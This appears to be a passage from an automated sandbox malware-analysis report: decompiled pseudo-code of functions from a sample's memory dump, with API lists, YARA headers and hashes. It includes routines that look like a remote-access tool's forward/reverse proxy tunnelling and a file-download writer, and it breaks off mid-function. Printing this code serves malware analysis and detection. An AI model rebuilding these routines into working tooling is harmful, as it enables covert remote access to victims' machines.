                              0x00445488
                              0x0044548e
                              0x0044548e
                              0x00000000
                              0x0044548e
                              0x00445119
                              0x0044511f
                              0x00000000
                              0x00000000
                              0x00445127
                              0x00445133
                              0x00445136
                              0x00445139
                              0x0044513c
                              0x00445143
                              0x00445146
                              0x0044514a
                              0x0044514d
                              0x00445150
                              0x00000000
                              0x00000000
                              0x00445156
                              0x00445159
                              0x0044515f
                              0x00445179
                              0x0044517b
                              0x00445477
                              0x00000000
                              0x00445477
                              0x00445181
                              0x00445185
                              0x00000000
                              0x00000000
                              0x0044518b
                              0x0044518f
                              0x00000000
                              0x00000000
                              0x00445196
                              0x0044519a
                              0x0044519d
                              0x004451a0
                              0x004451a5
                              0x004451a5
                              0x004451a8
                              0x004451c5
                              0x004451ca
                              0x004451cc
                              0x004451ce
                              0x004451ee
                              0x004451ef
                              0x004451f1
                              0x004451f4
                              0x004451f6
                              0x004451f8
                              0x004451fa
                              0x004451fa
                              0x00445205
                              0x00445207
                              0x0044520e
                              0x00445213
                              0x00445216
                              0x00445219
                              0x0044521b
                              0x00445240
                              0x00445245
                              0x0044524c
                              0x0044524f
                              0x00445252
                              0x00445256
                              0x00445258
                              0x0044525c
                              0x0044525e
                              0x00445261
                              0x00445264
                              0x00445266
                              0x00445269
                              0x00445270
                              0x00445273
                              0x00445278
                              0x0044527b
                              0x00445284
                              0x00445288
                              0x0044528b
                              0x0044528e
                              0x00445291
                              0x00445297
                              0x00445299
                              0x004452a2
                              0x004452a5
                              0x004452a8
                              0x004452ab
                              0x004452ac
                              0x004452b0
                              0x004452b6
                              0x004452c0
                              0x004452c5
                              0x004452d5
                              0x004452d9
                              0x004452dc
                              0x004452de
                              0x004452e0
                              0x004452e2
                              0x004452e4
                              0x004452ec
                              0x004452ed
                              0x004452f0
                              0x004452f3
                              0x004452f4
                              0x004452fa
                              0x00445304
                              0x0044530c
                              0x0044530f
                              0x0044531b
                              0x0044531f
                              0x00445322
                              0x00445324
                              0x00445326
                              0x00445328
                              0x0044532a
                              0x00445332
                              0x00445333
                              0x00445336
                              0x00445339
                              0x00445339
                              0x0044533a
                              0x00445340
                              0x0044534a
                              0x0044534a
                              0x00445328
                              0x00445324
                              0x0044530f
                              0x004452e2
                              0x004452de
                              0x004452c5
                              0x00445299
                              0x00445291
                              0x00445350
                              0x00445356
                              0x00445358
                              0x004453cb
                              0x004453cb
                              0x004453cf
                              0x004453df
                              0x004453e5
                              0x004453e7
                              0x00445443
                              0x00445443
                              0x0044544b
                              0x0044544c
                              0x0044544e
                              0x00445467
                              0x0044546a
                              0x004453a7
                              0x004453a8
                              0x00000000
                              0x004453ad
                              0x00445470
                              0x00000000
                              0x00445470
                              0x00445455
                              0x00445460
                              0x00000000
                              0x00445460
                              0x004453e9
                              0x004453ec
                              0x004453ef
                              0x00000000
                              0x00000000
                              0x004453f1
                              0x004453f1
                              0x004453f4
                              0x004453f7
                              0x004453fa
                              0x00445401
                              0x00445406
                              0x00445408
                              0x0044540c
                              0x00445427
                              0x0044542b
                              0x0044542c
                              0x0044542f
                              0x00445430
                              0x0044543c
                              0x00445432
                              0x00445432
                              0x00445432
                              0x0044540e
                              0x0044540e
                              0x0044540e
                              0x00445419
                              0x0044541e
                              0x00445421
                              0x00445421
                              0x00000000
                              0x00445406
                              0x0044535d
                              0x00445360
                              0x00445367
                              0x0044536c
                              0x00000000
                              0x00000000
                              0x00445375
                              0x0044537b
                              0x0044537d
                              0x00000000
                              0x00000000
                              0x0044537f
                              0x00445383
                              0x00000000
                              0x00000000
                              0x00445397
                              0x0044539d
                              0x0044539f
                              0x004453c3
                              0x004453c6
                              0x00000000
                              0x004453c6
                              0x004453a1
                              0x00000000
                              0x0044521d
                              0x00445222
                              0x0044522d
                              0x004453ae
                              0x004453ae
                              0x004453ae
                              0x004453b1
                              0x004453b2
                              0x00000000
                              0x004453ba
                              0x0044521b
                              0x004451d0
                              0x004451d5
                              0x004451dc
                              0x004451e2
                              0x00000000
                              0x004451e2
                              0x004451aa
                              0x004451ad
                              0x004451b7
                              0x004451b7
                              0x004451ba
                              0x004451bd
                              0x00000000
                              0x004451bd
                              0x004451b1
                              0x004451b3
                              0x004451b5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004451b5
                              0x00445161
                              0x00445166
                              0x0044516e
                              0x00000000
                              0x004450f9
                              0x004450fe
                              0x00445101
                              0x00445106
                              0x00445493
                              0x00000000
                              0x00445493

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8fd86c6647246273acac44db2b30acb8fcf3bf49200610810839ec3576b6ec27
                              • Instruction ID: d415aa42f168db04541a2b881a195995a4068d2056edb743f6be97fc2ac4bfb3
                              • Opcode Fuzzy Hash: 8fd86c6647246273acac44db2b30acb8fcf3bf49200610810839ec3576b6ec27
                              • Instruction Fuzzy Hash: A1C10971D04749AFEF11DFA9C841BAEBBB4AF09304F18009AE8149B393D7789D41CB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F248, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 182COMMON
                              Download Yara Rule
                              C-Code - Quality: 65%
                              			E0040F248(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t23;
				void* _t29;
				char* _t32;
				intOrPtr _t45;
				char* _t46;
				char* _t53;
				char* _t58;
				intOrPtr _t110;
				void* _t114;
				void* _t115;
				char* _t117;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t132;

				_t134 = __eflags;
				_t101 = __edx;
				_push(_t61);
				_t110 = _a4;
				E004020CC(_t61,  &_v76, __edx, __eflags, _t110 + 0x1c);
				SetEvent( *(_t110 + 0x34));
				_t23 = L00401F75( &_v80);
				E00404286( &_v80,  &_v56, 4, 0xffffffff);
				_t126 = (_t123 & 0xfffffff8) - 0x3c;
				E004020CC(_t61, _t126, _t101, _t134, 0x46c238);
				_t127 = _t126 - 0x18;
				E004020CC(_t61, _t127, _t101, _t134,  &_v72);
				_t29 = L00416DD0( &_v112, _t101);
				_t128 = _t127 + 0x30;
				_t114 =  *_t23 - 0x46;
				if(_t114 == 0) {
					_t32 = E0040A15B(L00401F75(L00401E29( &_v88, _t101, __eflags, 1)));
					_t61 = _t32;
					__eflags = _t32;
					if(__eflags == 0) {
						_t115 = _t128 - 0x18;
						_push("1");
						L19:
						_t101 = L00402F97( &_v32, L00401E29( &_v88, _t101, __eflags, 0), 0x46c238);
						E0040530D(_t61, _t115, _t34, _t110, __eflags);
						_push(0x85);
						L00404A6E(_t61, _t110, _t34, __eflags);
						L00401FA7();
						L20:
						L00401E54( &_v108, _t101);
						L00401FA7();
						L00401FA7();
						return 0;
					}
					_t117 = E0040A1B1(_t61, "StartForward");
					 *0x46bd3c = _t117;
					 *0x46bd38 = E0040A1B1(_t61, "StartReverse");
					 *0x46bd40 = E0040A1B1(_t61, "StopForward");
					_t45 = E0040A1B1(_t61, "StopReverse");
					_t101 = "GetDirectListeningPort";
					 *0x46bd48 = _t45;
					_t46 = E0040A1B1(_t61, "GetDirectListeningPort");
					 *0x46bd44 = _t46;
					__eflags = _t117;
					if(__eflags == 0) {
						L17:
						_t115 = _t128 - 0x18;
						_push(0x45f6d0);
						goto L19;
					}
					__eflags =  *0x46bd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46bd40;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t46;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46bd4c = 1;
					E004020CC(_t61, _t128 - 0x18, "GetDirectListeningPort", __eflags, L00401E29( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					L00404A6E(_t61, _t110, _t101, __eflags);
					goto L20;
				}
				_t118 = _t114 - 1;
				if(_t118 == 0) {
					_t53 =  *0x46bd3c(E00436079(_t50, L00401F75(L00401E29( &_v88, _t101, __eflags, 0))));
					_t132 = _t128 - 0x14;
					L9:
					_t101 = _t53;
					L00416B7E(_t61, _t132, _t53);
					_push(0x77);
					goto L10;
				}
				_t119 = _t118 - 1;
				if(_t119 == 0) {
					__imp__#12( *0x46c774);
					_t58 =  *0x46bd38(_t29, E00436079(_t55, L00401F75(L00401E29( &_v92, _t101, __eflags, 0))) & 0x0000ffff);
					__eflags = _t58;
					_t99 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					_t101 = _t58;
					L00416B7E(_t61, _t128 - 0x10, _t58);
					_push(0x78);
					goto L10;
				}
				_t121 = _t119 - 1;
				if(_t121 == 0) {
					_t53 =  *0x46bd40();
					_t132 = _t128 - 0x18;
					goto L9;
				}
				if(_t121 == 1) {
					 *0x46bd48();
					 *0x46bd4d = 0;
				}
				goto L20;
			}




































                              0x0040f248
                              0x0040f248
                              0x0040f255
                              0x0040f258
                              0x0040f25f
                              0x0040f267
                              0x0040f271
                              0x0040f285
                              0x0040f28a
                              0x0040f294
                              0x0040f299
                              0x0040f2a3
                              0x0040f2ac
                              0x0040f2b1
                              0x0040f2b4
                              0x0040f2b7
                              0x0040f39b
                              0x0040f3a0
                              0x0040f3a2
                              0x0040f3a4
                              0x0040f44f
                              0x0040f451
                              0x0040f456
                              0x0040f472
                              0x0040f476
                              0x0040f47c
                              0x0040f483
                              0x0040f48c
                              0x0040f491
                              0x0040f495
                              0x0040f49e
                              0x0040f4a7
                              0x0040f4b4
                              0x0040f4b4
                              0x0040f3b6
                              0x0040f3bf
                              0x0040f3cf
                              0x0040f3e0
                              0x0040f3e7
                              0x0040f3ec
                              0x0040f3f1
                              0x0040f3f8
                              0x0040f3fd
                              0x0040f402
                              0x0040f404
                              0x0040f440
                              0x0040f443
                              0x0040f445
                              0x00000000
                              0x0040f445
                              0x0040f406
                              0x0040f40d
                              0x00000000
                              0x00000000
                              0x0040f40f
                              0x0040f416
                              0x00000000
                              0x00000000
                              0x0040f418
                              0x0040f41a
                              0x00000000
                              0x00000000
                              0x0040f422
                              0x0040f434
                              0x0040f439
                              0x0040f37b
                              0x0040f37d
                              0x00000000
                              0x0040f37d
                              0x0040f2bd
                              0x0040f2c0
                              0x0040f367
                              0x0040f36d
                              0x0040f370
                              0x0040f370
                              0x0040f374
                              0x0040f379
                              0x00000000
                              0x0040f379
                              0x0040f2c6
                              0x0040f2c9
                              0x0040f2fc
                              0x0040f322
                              0x0040f332
                              0x0040f334
                              0x0040f33a
                              0x0040f340
                              0x0040f344
                              0x0040f349
                              0x00000000
                              0x0040f349
                              0x0040f2cb
                              0x0040f2ce
                              0x0040f2eb
                              0x0040f2f1
                              0x00000000
                              0x0040f2f1
                              0x0040f2d3
                              0x0040f2d9
                              0x0040f2df
                              0x0040f2df
                              0x00000000

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Eventinet_ntoa
                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                              • API String ID: 3578746661-168337528
                              • Opcode ID: a95b8ae20f3fd08dff746163321b5a77884589e7b86b1a448bab388508454adb
                              • Instruction ID: f9a444815650af3872de27879d45234466d6e45f99ea988061a4b43b2ad98d54
                              • Opcode Fuzzy Hash: a95b8ae20f3fd08dff746163321b5a77884589e7b86b1a448bab388508454adb
                              • Instruction Fuzzy Hash: 3351D631A043019BC714BB79DC5AA6E36A59B91318F40453FF801AB6E2EF7C994887DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040628B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E0040628B(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				L004505A0();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E004032FA(0,  &_v48, __eflags, L00407516( &_v72,  &_a12, __eflags, L".part"));
				L00401ED0();
				_t37 = CreateFileW(L00401ECB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = L00401ECB( &_a12);
					MoveFileW(L00401ECB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = L00404B24( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E0040208B(_t58, _t82, _t74, _t85,  &_v12, 8);
								L00404A6E(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(L00401ECB( &_v48));
						}
					}
				}
				L9:
				L00401ED0();
				L00401ED0();
				return _t58;
			}





















                              0x00406293
                              0x0040629c
                              0x004062a0
                              0x004062a3
                              0x004062a6
                              0x004062a8
                              0x004062b5
                              0x004062c2
                              0x004062ca
                              0x004062e4
                              0x004062ed
                              0x004062f0
                              0x004062f3
                              0x00406365
                              0x00406366
                              0x0040636f
                              0x0040637e
                              0x00406384
                              0x004062f5
                              0x004062f5
                              0x004062f8
                              0x00000000
                              0x004062fa
                              0x004062fa
                              0x004062fd
                              0x00000000
                              0x004062ff
                              0x004062ff
                              0x004062ff
                              0x0040630e
                              0x00406313
                              0x00406315
                              0x00406316
                              0x0040631d
                              0x0040632c
                              0x00406332
                              0x0040633d
                              0x00406347
                              0x0040634e
                              0x00000000
                              0x00000000
                              0x00406356
                              0x00406359
                              0x00000000
                              0x00406362
                              0x00406362
                              0x00000000
                              0x00406362
                              0x00000000
                              0x00406359
                              0x004063a2
                              0x004063b1
                              0x004063b1
                              0x004062fd
                              0x004062f8
                              0x00406386
                              0x00406389
                              0x00406391
                              0x0040639e

                              APIs
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004062E4
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 0040632C
                              • CloseHandle.KERNEL32(00000000), ref: 00406366
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
                              • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063A2
                              • DeleteFileW.KERNEL32(00000000), ref: 004063B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                              • String ID: .part
                              • API String ID: 820096542-3499674018
                              • Opcode ID: f3cb019698be5a900786293b9166b6942b5a3b98ed67e879c300892666d1ec9c
                              • Instruction ID: d9bd7d9a32dec13802f65ee1536d1b778e09315ea91cc40d0f5a3459ff757ad6
                              • Opcode Fuzzy Hash: f3cb019698be5a900786293b9166b6942b5a3b98ed67e879c300892666d1ec9c
                              • Instruction Fuzzy Hash: 10314971D00219AFCB10EFA5DD569EEB778FB44356F10847AF812B3191DA34AA44CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044326D, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                              Download Yara Rule
                              C-Code - Quality: 69%
                              			E0044326D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46a00c; // 0x7df2b874
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = L0043EE69(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return L0042F61B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							L004304BD(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0044132F(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									L004304BD(_t101);
									goto L36;
								}
								_t62 = E0044132F(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									L004304BD(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = L0043E61D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00450080();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0044132F(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = L0043E61D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00450080();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                              0x00443272
                              0x00443273
                              0x00443274
                              0x0044327b
                              0x0044327f
                              0x00443280
                              0x00443286
                              0x0044328c
                              0x00443292
                              0x00443295
                              0x00443295
                              0x00443298
                              0x0044329a
                              0x0044329a
                              0x00443298
                              0x0044329c
                              0x004432a1
                              0x004432a8
                              0x004432ab
                              0x004432ab
                              0x004432c7
                              0x004432cd
                              0x004432d2
                              0x00443465
                              0x00443478
                              0x004432d8
                              0x004432d8
                              0x004432db
                              0x004432e0
                              0x004432e4
                              0x00443338
                              0x00443338
                              0x0044333a
                              0x0044333c
                              0x0044345a
                              0x0044345a
                              0x0044345c
                              0x0044345d
                              0x00000000
                              0x00443463
                              0x0044334d
                              0x00443353
                              0x00443355
                              0x00000000
                              0x00000000
                              0x0044335b
                              0x0044336d
                              0x00443372
                              0x00443376
                              0x00000000
                              0x00000000
                              0x00443383
                              0x004433bd
                              0x004433c0
                              0x004433c3
                              0x004433c5
                              0x004433c7
                              0x004433c9
                              0x00443415
                              0x00443415
                              0x00443417
                              0x00443417
                              0x00443419
                              0x00443453
                              0x00443454
                              0x00000000
                              0x00443459
                              0x0044342d
                              0x00443432
                              0x00443434
                              0x00000000
                              0x00000000
                              0x00443438
                              0x00443439
                              0x0044343a
                              0x0044343d
                              0x00443479
                              0x0044347c
                              0x0044343f
                              0x0044343f
                              0x00443440
                              0x00443440
                              0x0044344d
                              0x0044344f
                              0x00443451
                              0x00443482
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00443451
                              0x004433cb
                              0x004433ce
                              0x004433d0
                              0x004433d2
                              0x004433d4
                              0x004433d7
                              0x004433dc
                              0x004433f7
                              0x004433f9
                              0x00443403
                              0x00443405
                              0x00443406
                              0x00443408
                              0x00000000
                              0x00000000
                              0x0044340a
                              0x00443410
                              0x00443410
                              0x00000000
                              0x00443410
                              0x004433de
                              0x004433e0
                              0x004433e4
                              0x004433e9
                              0x004433eb
                              0x004433ed
                              0x00000000
                              0x00000000
                              0x004433ef
                              0x00000000
                              0x004433ef
                              0x00443385
                              0x0044338a
                              0x00000000
                              0x00000000
                              0x00443390
                              0x00443392
                              0x00000000
                              0x00000000
                              0x004433a9
                              0x004433ae
                              0x004433b2
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004433b8
                              0x004432eb
                              0x004432ed
                              0x004432ef
                              0x004432f7
                              0x00443316
                              0x00443318
                              0x00443322
                              0x00443324
                              0x00443325
                              0x00443327
                              0x00000000
                              0x00000000
                              0x0044332d
                              0x00443333
                              0x00443333
                              0x00000000
                              0x00443333
                              0x004432fb
                              0x004432ff
                              0x00443304
                              0x00443308
                              0x00000000
                              0x00000000
                              0x0044330e
                              0x00000000
                              0x0044330e

                              APIs
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 004432C7
                              • __alloca_probe_16.LIBCMT ref: 004432FF
                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 0044334D
                              • __alloca_probe_16.LIBCMT ref: 004433E4
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00443447
                              • __freea.LIBCMT ref: 00443454
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,0046C500,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F
                              • __freea.LIBCMT ref: 0044345D
                              • __freea.LIBCMT ref: 00443482
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                              • String ID:
                              • API String ID: 2597970681-0
                              • Opcode ID: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
                              • Instruction ID: 0cad5e9ef2b3b2de0836d9d1cfed8af2ee8cc4fd49053d42945b5b1fc1f44aaa
                              • Opcode Fuzzy Hash: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
                              • Instruction Fuzzy Hash: 1F511672A00216ABFB264E61DC41EEF77A9EB44B56F14466AFD04D6280DB3CDD408698
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0043D1E1, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMON
                              Download Yara Rule
                              C-Code - Quality: 76%
                              			E0043D1E1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				void* _t244;
				signed int _t247;
				signed int _t249;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t261;
				signed int _t263;
				void* _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int _t270;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				intOrPtr _t283;
				signed int _t286;
				signed int _t290;
				signed int _t291;
				signed int _t296;
				signed int _t299;
				signed int _t319;
				signed int _t320;
				signed int _t323;
				signed int _t328;
				void* _t330;
				signed int _t332;
				void* _t333;
				intOrPtr _t334;
				signed int _t339;
				signed int _t340;
				intOrPtr* _t343;
				signed int _t357;
				signed int _t359;
				signed int _t361;
				intOrPtr* _t362;
				signed int _t364;
				signed int _t370;
				intOrPtr* _t374;
				intOrPtr* _t377;
				void* _t380;
				intOrPtr* _t381;
				intOrPtr* _t382;
				signed int _t393;
				signed int _t396;
				intOrPtr* _t397;
				signed int _t399;
				signed int* _t403;
				intOrPtr* _t410;
				intOrPtr* _t411;
				signed int _t421;
				short _t422;
				void* _t424;
				signed int _t425;
				signed int _t427;
				intOrPtr _t428;
				signed int _t431;
				intOrPtr _t432;
				signed int _t434;
				signed int _t437;
				intOrPtr _t443;
				signed int _t444;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				signed int _t452;
				signed int _t456;
				signed int* _t457;
				intOrPtr* _t458;
				short _t459;
				void* _t461;
				signed int _t463;
				signed int _t465;
				void* _t467;
				void* _t468;
				void* _t470;
				signed int _t471;
				void* _t472;
				void* _t474;
				signed int _t475;
				void* _t477;
				void* _t479;
				intOrPtr _t491;

				_t420 = __edx;
				_t461 = _t467;
				_t468 = _t467 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t357 = L0043E61D(__ecx, 0x6a6);
				_t240 = 0;
				_pop(_t370);
				if(_t357 == 0) {
					L20:
					return _t240;
				} else {
					_push(__edi);
					_t2 = _t357 + 4; // 0x4
					_t427 = _t2;
					 *_t427 = 0;
					 *_t357 = 1;
					_t443 = _a4;
					_t4 = _t443 + 0x30; // 0x43c9e0
					_t241 = _t4;
					_push( *_t241);
					_v16 = _t241;
					_push(0x457488);
					_push( *0x457344);
					E0043D120(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
					_t470 = _t468 + 0x18;
					_v8 = 0x457344;
					while(1) {
						L2:
						_t244 = L00446DB7(_t427, 0x351, ";");
						_t471 = _t470 + 0xc;
						if(_t244 != 0) {
							break;
						} else {
							_t8 = _v16 + 0x10; // 0x10
							_t410 = _t8;
							_t339 =  *_v16;
							_v16 = _t410;
							_t411 =  *_t410;
							goto L4;
						}
						while(1) {
							L4:
							_t420 =  *_t339;
